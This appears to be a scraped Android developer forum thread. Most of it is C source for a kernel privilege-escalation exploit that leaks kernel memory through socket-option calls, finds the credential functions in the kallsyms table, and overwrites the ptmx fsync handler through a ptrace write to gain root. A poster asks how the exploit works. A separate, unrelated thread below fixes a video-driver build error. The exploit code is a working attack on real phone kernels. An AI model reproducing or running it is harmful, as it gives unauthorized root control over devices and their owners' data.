unsigned long pattern_kallsyms_addresses2[] = {
0xc0008000, /* stext */
0xc0008000 /* _text */
};
unsigned long pattern_kallsyms_addresses3[] = {
0xc00081c0, /* asm_do_IRQ */
0xc00081c0, /* _stext */
0xc00081c0 /* __exception_text_start */
};
unsigned long kallsyms_num_syms;
unsigned long *kallsyms_addresses;
unsigned char *kallsyms_names;
unsigned char *kallsyms_token_table;
unsigned short *kallsyms_token_index;
unsigned long *kallsyms_markers;
unsigned long prepare_kernel_cred_address = 0;
unsigned long commit_creds_address = 0;
unsigned long ptmx_fops_address = 0;
unsigned long ptmx_open_address = 0;
unsigned long tty_init_dev_address = 0;
unsigned long tty_release_address = 0;
unsigned long tty_fasync_address = 0;
unsigned long ptm_driver_address = 0;
struct cred;
struct task_struct;
struct cred *(*prepare_kernel_cred)(struct task_struct *);
int (*commit_creds)(struct cred *);
bool bChiled;
int read_value_at_address(unsigned long address, unsigned long *value) {
int sock;
int ret;
int i;
unsigned long addr = address;
unsigned char *pval = (unsigned char *)value;
socklen_t optlen = 1;
*value = 0;
errno = 0;
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock < 0) {
fprintf(stderr, "socket() failed: %s.\n", strerror(errno));
return -1;
}
for (i = 0; i < sizeof(*value); i++, addr++, pval++) {
errno = 0;
ret = setsockopt(sock, SOL_IP, IP_TTL, (void *)addr, 1);
if (ret != 0) {
if (errno != EINVAL) {
fprintf(stderr, "setsockopt() failed: %s.\n", strerror(errno));
close(sock);
*value = 0;
return -1;
}
}
errno = 0;
ret = getsockopt(sock, SOL_IP, IP_TTL, pval, &optlen);
if (ret != 0) {
fprintf(stderr, "getsockopt() failed: %s.\n", strerror(errno));
close(sock);
*value = 0;
return -1;
}
}
close(sock);
return 0;
}
unsigned long *kerneldump(unsigned long startaddr, unsigned long dumpsize) {
unsigned long addr;
unsigned long val;
unsigned long *allocaddr;
unsigned long *memaddr;
int cnt, num, divsize;
printf("kernel dump...\n");
allocaddr = (unsigned long *)malloc(dumpsize);
if (allocaddr == NULL) {
fprintf(stderr, "malloc failed: %s.\n", strerror(errno));
return NULL;
}
memaddr = allocaddr;
cnt = 0;
num = 0;
divsize = dumpsize / 10;
for (addr = startaddr; addr < (startaddr + dumpsize); addr += 4, memaddr++) {
if (read_value_at_address(addr, &val) != 0) {
printf("\n");
fprintf(stderr, "kerneldump failed: %s.\n", strerror(errno));
return NULL;
}
*memaddr = val;
cnt += 4;
if (cnt >= divsize) {
cnt = 0;
num++;
printf("%d ", num);
fflush(stdout);
}
}
printf("\n");
return allocaddr;
}
int check_pattern(unsigned long *addr, unsigned long *pattern, int patternnum) {
unsigned long val;
unsigned long cnt;
unsigned long i;
read_value_at_address((unsigned long)addr, &val);
if (val == pattern[0]) {
cnt = 1;
for (i = 1; i < patternnum; i++) {
read_value_at_address((unsigned long)(&addr[i]), &val);
if (val == pattern[i]) {
cnt++;
} else {
break;
}
}
if (cnt == patternnum) {
return 0;
}
}
return -1;
}
int check_kallsyms_header(unsigned long *addr) {
if (check_pattern(addr, pattern_kallsyms_addresses, sizeof(pattern_kallsyms_addresses) / 4) == 0) {
return 0;
} else if (check_pattern(addr, pattern_kallsyms_addresses2, sizeof(pattern_kallsyms_addresses2) / 4) == 0) {
return 0;
} else if (check_pattern(addr, pattern_kallsyms_addresses3, sizeof(pattern_kallsyms_addresses3) / 4) == 0) {
return 0;
}
return -1;
}
int get_kallsyms_addresses() {
unsigned long *endaddr;
unsigned long i, j;
unsigned long *addr;
unsigned long n;
unsigned long val;
unsigned long off;
int cnt, num;
if (read_value_at_address(KERNEL_START_ADDRESS, &val) != 0) {
fprintf(stderr, "this device is not supported.\n");
return -1;
}
printf("search kallsyms...\n");
endaddr = (unsigned long *)(KERNEL_START_ADDRESS + KERNEL_SIZE);
cnt = 0;
num = 0;
for (i = 0; i < (KERNEL_START_ADDRESS + KERNEL_SIZE - SEARCH_START_ADDRESS); i += 16) {
for (j = 0; j < 2; j++) {
cnt += 4;
if (cnt >= 0x10000) {
cnt = 0;
num++;
printf("%d ", num);
fflush(stdout);
}
/* get kallsyms_addresses pointer */
if (j == 0) {
kallsyms_addresses = (unsigned long *)(SEARCH_START_ADDRESS + i);
} else {
if ((i == 0) || ((SEARCH_START_ADDRESS - i) < KERNEL_START_ADDRESS)) {
continue;
}
kallsyms_addresses = (unsigned long *)(SEARCH_START_ADDRESS - i);
}
if (check_kallsyms_header(kallsyms_addresses) != 0) {
continue;
}
addr = kallsyms_addresses;
off = 0;
/* search end of kallsyms_addresses */
n = 0;
while (1) {
read_value_at_address((unsigned long)addr, &val);
if (val < KERNEL_START_ADDRESS) {
break;
}
n++;
addr++;
off++;
if (addr >= endaddr) {
return -1;
}
}
/* skip there is filled by 0x0 */
while (1) {
read_value_at_address((unsigned long)addr, &val);
if (val != 0) {
break;
}
addr++;
off++;
if (addr >= endaddr) {
return -1;
}
}
read_value_at_address((unsigned long)addr, &val);
kallsyms_num_syms = val;
addr++;
off++;
if (addr >= endaddr) {
return -1;
}
/* check kallsyms_num_syms */
if (kallsyms_num_syms != n) {
continue;
}
if (num > 0) {
printf("\n");
}
printf("(kallsyms_addresses=%08x)\n", (unsigned long)kallsyms_addresses);
printf("(kallsyms_num_syms=%08x)\n", kallsyms_num_syms);
kallsymsmem = kerneldump((unsigned long)kallsyms_addresses, KALLSYMS_SIZE);
if (kallsymsmem == NULL) {
return -1;
}
kallsyms_addresses = kallsymsmem;
endaddr = (unsigned long *)((unsigned long)kallsymsmem + KALLSYMS_SIZE);
addr = &kallsymsmem[off];
/* skip there is filled by 0x0 */
while (addr[0] == 0x00000000) {
addr++;
if (addr >= endaddr) {
return -1;
}
}
kallsyms_names = (unsigned char *)addr;
/* search end of kallsyms_names */
for (i = 0, off = 0; i < kallsyms_num_syms; i++) {
int len = kallsyms_names[off];
off += len + 1;
if (&kallsyms_names[off] >= (unsigned char *)endaddr) {
return -1;
}
}
/* adjust */
addr = (unsigned long *)((((unsigned long)&kallsyms_names[off] - 1) | 0x3) + 1);
if (addr >= endaddr) {
return -1;
}
/* skip there is filled by 0x0 */
while (addr[0] == 0x00000000) {
addr++;
if (addr >= endaddr) {
return -1;
}
}
/* but kallsyms_markers shoud be start 0x00000000 */
addr--;
kallsyms_markers = addr;
/* end of kallsyms_markers */
addr = &kallsyms_markers[((kallsyms_num_syms - 1) >> 8) + 1];
if (addr >= endaddr) {
return -1;
}
/* skip there is filled by 0x0 */
while (addr[0] == 0x00000000) {
addr++;
if (addr >= endaddr) {
return -1;
}
}
kallsyms_token_table = (unsigned char *)addr;
i = 0;
while ((kallsyms_token_table[i] != 0x00) || (kallsyms_token_table[i + 1] != 0x00)) {
i++;
if (&kallsyms_token_table[i - 1] >= (unsigned char *)endaddr) {
return -1;
}
}
/* skip there is filled by 0x0 */
while (kallsyms_token_table[i] == 0x00) {
i++;
if (&kallsyms_token_table[i - 1] >= (unsigned char *)endaddr) {
return -1;
}
}
/* but kallsyms_markers shoud be start 0x0000 */
kallsyms_token_index = (unsigned short *)&kallsyms_token_table[i - 2];
return 0;
}
}
if (num > 0) {
printf("\n");
}
return -1;
}
unsigned long kallsyms_expand_symbol(unsigned long off, char *namebuf) {
int len;
int skipped_first;
unsigned char *tptr;
unsigned char *data;
/* Get the compressed symbol length from the first symbol byte. */
data = &kallsyms_names[off];
len = *data;
off += len + 1;
data++;
skipped_first = 0;
while (len > 0) {
tptr = &kallsyms_token_table[kallsyms_token_index[*data]];
data++;
len--;
while (*tptr > 0) {
if (skipped_first != 0) {
*namebuf = *tptr;
namebuf++;
} else {
skipped_first = 1;
}
tptr++;
}
}
*namebuf = '\0';
return off;
}
int search_functions() {
char namebuf[1024];
unsigned long i;
unsigned long off;
int cnt;
cnt = 0;
for (i = 0, off = 0; i < kallsyms_num_syms; i++) {
off = kallsyms_expand_symbol(off, namebuf);
if (strcmp(namebuf, "prepare_kernel_cred") == 0) {
prepare_kernel_cred_address = kallsyms_addresses[i];
cnt++;
} else if (strcmp(namebuf, "commit_creds") == 0) {
commit_creds_address = kallsyms_addresses[i];
cnt++;
} else if (strcmp(namebuf, "ptmx_open") == 0) {
ptmx_open_address = kallsyms_addresses[i];
cnt++;
} else if (strcmp(namebuf, "tty_init_dev") == 0) {
tty_init_dev_address = kallsyms_addresses[i];
cnt++;
} else if (strcmp(namebuf, "tty_release") == 0) {
tty_release_address = kallsyms_addresses[i];
cnt++;
} else if (strcmp(namebuf, "tty_fasync") == 0) {
tty_fasync_address = kallsyms_addresses[i];
cnt++;
} else if (strcmp(namebuf, "ptmx_fops") == 0) {
ptmx_fops_address = kallsyms_addresses[i];
}
}
if (cnt < 6) {
return -1;
}
return 0;
}
void analyze_ptmx_open() {
unsigned long i, j, k;
unsigned long addr;
unsigned long val;
unsigned long regnum;
unsigned long data_addr;
printf("analyze ptmx_open...\n");
for (i = 0; i < 0x200; i += 4) {
addr = ptmx_open_address + i;
read_value_at_address(addr, &val);
if ((val & 0xff000000) == 0xeb000000) {
if ((((tty_init_dev_address / 4) - (addr / 4 + 2)) & 0x00ffffff) == (val & 0x00ffffff)) {
for (j = 1; j <= i; j++) {
addr = ptmx_open_address + i - j;
read_value_at_address(addr, &val);
if ((val & 0xfff0f000) == 0xe5900000) {
regnum = (val & 0x000f0000) >> 16;
for (k = 1; k <= (i - j); k++) {
addr = ptmx_open_address + i - j - k;
read_value_at_address(addr, &val);
if ((val & 0xfffff000) == (0xe59f0000 + (regnum << 12))) {
data_addr = addr + (val & 0x00000fff) + 8;
read_value_at_address(data_addr, &val);
ptm_driver_address = val;
return;
}
}
}
}
}
}
}
return;
}
unsigned long search_ptmx_fops_address() {
unsigned long *addr;
unsigned long range;
unsigned long *ptmx_fops_open;
unsigned long i;
unsigned long val, val2, val5;
int cnt, num;
printf("search ptmx_fops...\n");
if (ptm_driver_address != 0) {
addr = (unsigned long *)ptm_driver_address;
} else {
addr = (unsigned long *)(kallsyms_addresses[kallsyms_num_syms - 1]);
}
addr++;
ptmx_fops_open = NULL;
range = ((KERNEL_START_ADDRESS + KERNEL_SIZE) - (unsigned long)addr) / sizeof(unsigned long);
cnt = 0;
num = 0;
for (i = 0; i < range - 14; i++) {
read_value_at_address((unsigned long)(&addr[i]), &val);
if (val == ptmx_open_address) {
read_value_at_address((unsigned long)(&addr[i + 2]), &val2);
if (val2 == tty_release_address) {
read_value_at_address((unsigned long)(&addr[i + 5]), &val5);
if (val5 == tty_fasync_address) {
ptmx_fops_open = &addr[i];
break;
}
}
}
cnt += 4;
if (cnt >= 0x10000) {
cnt = 0;
num++;
printf("%d ", num);
fflush(stdout);
}
}
if (num > 0) {
printf("\n");
}
if (ptmx_fops_open == NULL) {
return 0;
}
return ((unsigned long)ptmx_fops_open - 0x2c);
}
int get_addresses() {
if (get_kallsyms_addresses() != 0) {
if (kallsymsmem != NULL) {
free(kallsymsmem);
kallsymsmem = NULL;
}
fprintf(stderr, "kallsyms_addresses search failed.\n");
return -1;
}
if (search_functions() != 0) {
if (kallsymsmem != NULL) {
free(kallsymsmem);
kallsymsmem = NULL;
}
fprintf(stderr, "search_functions failed.\n");
return -1;
}
if (ptmx_fops_address == 0) {
analyze_ptmx_open();
ptmx_fops_address = search_ptmx_fops_address();
if (ptmx_fops_address == 0) {
if (kallsymsmem != NULL) {
free(kallsymsmem);
kallsymsmem = NULL;
}
fprintf(stderr, "search_ptmx_fops_address failed.\n");
return -1;
}
}
if (kallsymsmem != NULL) {
free(kallsymsmem);
kallsymsmem = NULL;
}
printf("\n");
printf("prepare_kernel_cred=%08x\n", prepare_kernel_cred_address);
printf("commit_creds=%08x\n", commit_creds_address);
printf("ptmx_fops=%08x\n", ptmx_fops_address);
printf("\n");
return 0;
}
void obtain_root_privilege(void) {
commit_creds(prepare_kernel_cred(0));
}
static bool run_obtain_root_privilege(void *user_data) {
int fd;
fd = open(PTMX_DEVICE, O_WRONLY);
fsync(fd);
close(fd);
return true;
}
void ptrace_write_value_at_address(unsigned long int address, void *value) {
pid_t pid;
long ret;
int status;
bChiled = false;
pid = fork();
if (pid < 0) {
return;
}
if (pid == 0) {
ret = ptrace(PTRACE_TRACEME, 0, 0, 0);
if (ret < 0) {
fprintf(stderr, "PTRACE_TRACEME failed\n");
}
bChiled = true;
signal(SIGSTOP, SIG_IGN);
kill(getpid(), SIGSTOP);
exit(EXIT_SUCCESS);
}
do {
ret = syscall(__NR_ptrace, PTRACE_PEEKDATA, pid, &bChiled, &bChiled);
} while (!bChiled);
ret = syscall(__NR_ptrace, PTRACE_PEEKDATA, pid, &value, (void *)address);
if (ret < 0) {
fprintf(stderr, "PTRACE_PEEKDATA failed: %s\n", strerror(errno));
}
kill(pid, SIGKILL);
waitpid(pid, &status, WNOHANG);
}
bool ptrace_run_exploit(unsigned long int address, void *value, bool (*exploit_callback)(void *user_data), void *user_data) {
bool success;
ptrace_write_value_at_address(address, value);
success = exploit_callback(user_data);
return success;
}
static bool run_exploit(void) {
unsigned long int ptmx_fops_fsync_address;
ptmx_fops_fsync_address = ptmx_fops_address + 0x38;
return ptrace_run_exploit(ptmx_fops_fsync_address, &obtain_root_privilege, run_obtain_root_privilege, NULL);
}
int main(int argc, char **argv) {
char devicename[PROP_VALUE_MAX];
char buildid[PROP_VALUE_MAX];
__system_property_get("ro.build.product", devicename);
__system_property_get("ro.build.id", buildid);
printf("ro.build.product=%s\n", devicename);
printf("ro.build.id=%s\n", buildid);
if (get_addresses() != 0) {
exit(EXIT_FAILURE);
}
prepare_kernel_cred = (void *)prepare_kernel_cred_address;
commit_creds = (void *)commit_creds_address;
run_exploit();
if (getuid() != 0) {
printf("Failed to getroot.\n");
exit(EXIT_FAILURE);
}
printf("Succeeded in getroot!\n");
printf("\n");
if (argc >= 2) {
system(argv[1]);
} else {
system(EXECCOMMAND);
}
exit(EXIT_SUCCESS);
return 0;
}
Can anyone shed some light on:
How's this ~650 lines of C code exploiting the bug?
Where can I have more technical information on the bug realize the magic played by the code under the hood?[/code][/quote]
Trying to build a kernel from source for ZTE Vec 4G(msm8226 with 4G), but I'm getting an error I don't know how to fix.
I've already fixed some, as I have quiet a bit of C/C++ knowledge, but not this one:
Code:
CC drivers/media/platform/msm/vidc/msm_venc.o
drivers/media/platform/msm/vidc/msm_venc.c: In function 'try_set_ctrl':
drivers/media/platform/msm/vidc/msm_venc.c:1331: error: unknown field 'val' specified in initializer
drivers/media/platform/msm/vidc/msm_venc.c:1405: error: unknown field 'val' specified in initializer
Case that contains the first error line:
Code:
case V4L2_CID_MPEG_VIDC_VIDEO_NUM_P_FRAMES:
{
int num_p, num_b;
[COLOR="Red"]struct v4l2_ctrl update_ctrl = {.id = 0, .val = 0};[/COLOR]
if (ctrl->id == V4L2_CID_MPEG_VIDEO_H264_I_PERIOD &&
inst->fmts[CAPTURE_PORT]->fourcc != V4L2_PIX_FMT_H264 &&
inst->fmts[CAPTURE_PORT]->fourcc !=
V4L2_PIX_FMT_H264_NO_SC) {
dprintk(VIDC_ERR, "Control 0x%x only valid for H264",
ctrl->id);
rc = -ENOTSUPP;
break;
}
temp_ctrl = TRY_GET_CTRL(V4L2_CID_MPEG_VIDC_VIDEO_NUM_B_FRAMES);
num_b = temp_ctrl->val;
temp_ctrl = TRY_GET_CTRL(V4L2_CID_MPEG_VIDC_VIDEO_NUM_P_FRAMES);
num_p = temp_ctrl->val;
/* V4L2_CID_MPEG_VIDEO_H264_I_PERIOD and _NUM_P_FRAMES are
* implicitly tied to each other. If either is adjusted,
* the other needs to be adjusted in a complementary manner.
* Ideally we adjust _NUM_B_FRAMES as well but we'll leave it
* alone for now */
if (ctrl->id == V4L2_CID_MPEG_VIDEO_H264_I_PERIOD) {
num_p = ctrl->val - 1 - num_b;
update_ctrl.id = V4L2_CID_MPEG_VIDC_VIDEO_NUM_P_FRAMES;
update_ctrl.val = num_p;
} else if (ctrl->id == V4L2_CID_MPEG_VIDC_VIDEO_NUM_P_FRAMES) {
num_p = ctrl->val;
update_ctrl.id = V4L2_CID_MPEG_VIDEO_H264_I_PERIOD;
update_ctrl.val = num_p + num_b;
} else if (ctrl->id == V4L2_CID_MPEG_VIDC_VIDEO_NUM_B_FRAMES) {
num_b = ctrl->val;
update_ctrl.id = V4L2_CID_MPEG_VIDEO_H264_I_PERIOD;
update_ctrl.val = num_p + num_b;
}
if (update_ctrl.id) {
temp_ctrl = TRY_GET_CTRL(update_ctrl.id);
temp_ctrl->val = update_ctrl.val;
}
if (num_b) {
u32 max_num_b_frames = MAX_NUM_B_FRAMES;
property_id = HAL_PARAM_VENC_MAX_NUM_B_FRAMES;
pdata = &max_num_b_frames;
rc = call_hfi_op(hdev, session_set_property,
(void *)inst->session, property_id, pdata);
if (rc) {
dprintk(VIDC_ERR,
"Failed : Setprop MAX_NUM_B_FRAMES %d",
rc);
break;
}
}
property_id = HAL_CONFIG_VENC_INTRA_PERIOD;
intra_period.pframes = num_p;
intra_period.bframes = num_b;
pdata = &intra_period;
break;
}
Code:
case V4L2_CID_MPEG_VIDEO_BITRATE_MODE:
{
int final_mode = 0;
[COLOR="Red"]struct v4l2_ctrl update_ctrl = {.id = 0, .val = 0};[/COLOR]
/* V4L2_CID_MPEG_VIDEO_BITRATE_MODE and _RATE_CONTROL
* manipulate the same thing. If one control's state
* changes, try to mirror the state in the other control's
* value */
if (ctrl->id == V4L2_CID_MPEG_VIDEO_BITRATE_MODE) {
if (ctrl->val == V4L2_MPEG_VIDEO_BITRATE_MODE_VBR) {
final_mode = HAL_RATE_CONTROL_VBR_CFR;
update_ctrl.val =
V4L2_CID_MPEG_VIDC_VIDEO_RATE_CONTROL_VBR_CFR;
} else {/* ...if (ctrl->val == _BITRATE_MODE_CBR) */
final_mode = HAL_RATE_CONTROL_CBR_CFR;
update_ctrl.val =
V4L2_CID_MPEG_VIDC_VIDEO_RATE_CONTROL_CBR_CFR;
}
update_ctrl.id = V4L2_CID_MPEG_VIDC_VIDEO_RATE_CONTROL;
} else if (ctrl->id == V4L2_CID_MPEG_VIDC_VIDEO_RATE_CONTROL) {
switch (ctrl->val) {
case V4L2_CID_MPEG_VIDC_VIDEO_RATE_CONTROL_OFF:
case V4L2_CID_MPEG_VIDC_VIDEO_RATE_CONTROL_VBR_VFR:
case V4L2_CID_MPEG_VIDC_VIDEO_RATE_CONTROL_VBR_CFR:
update_ctrl.val =
V4L2_MPEG_VIDEO_BITRATE_MODE_VBR;
case V4L2_CID_MPEG_VIDC_VIDEO_RATE_CONTROL_CBR_VFR:
case V4L2_CID_MPEG_VIDC_VIDEO_RATE_CONTROL_CBR_CFR:
update_ctrl.val =
V4L2_MPEG_VIDEO_BITRATE_MODE_CBR;
}
final_mode = ctrl->val;
update_ctrl.id = V4L2_CID_MPEG_VIDEO_BITRATE_MODE;
}
if (update_ctrl.id) {
temp_ctrl = TRY_GET_CTRL(update_ctrl.id);
temp_ctrl->val = update_ctrl.val;
}
property_id = HAL_PARAM_VENC_RATE_CONTROL;
property_val = final_mode;
pdata = &property_val;
break;
}
Function calls:
Code:
for (c = 0; c < ctrl->ncontrols; ++c) {
if (ctrl->cluster[c]->is_new) {
struct v4l2_ctrl *temp = ctrl->cluster[c];
[COLOR="Red"]rc = try_set_ctrl(inst, temp);[/COLOR]
if (rc) {
dprintk(VIDC_ERR, "Failed setting %s (%x)",
v4l2_ctrl_get_name(temp->id),
temp->id);
break;
}
}
}
Whole file attached.
From the error, I can tell that .val isn't declared, or something similar, but I need help from an expert to fix it.
Faced with same problem for Alcatel OT Fire E 6015X. My solution:
- Install Android NDK (ArchLinux):
Code:
pacman -S android-ndk
- Add path:
Code:
export PATH=/opt/android-ndk/toolchains/arm-linux-androideabi-4.6/prebuilt/linux-x86_64/bin:${PATH}
- Run build:
Code:
make CROSS_COMPILE=arm-linux-androideabi- ARCH=arm zImage
need to replace every .val for .cur.val, the problem is that the val variable is declared within a union named cur inside the v4l2_ctrl structure. So in order for the Compiler to recognize it should be addressed thru the union var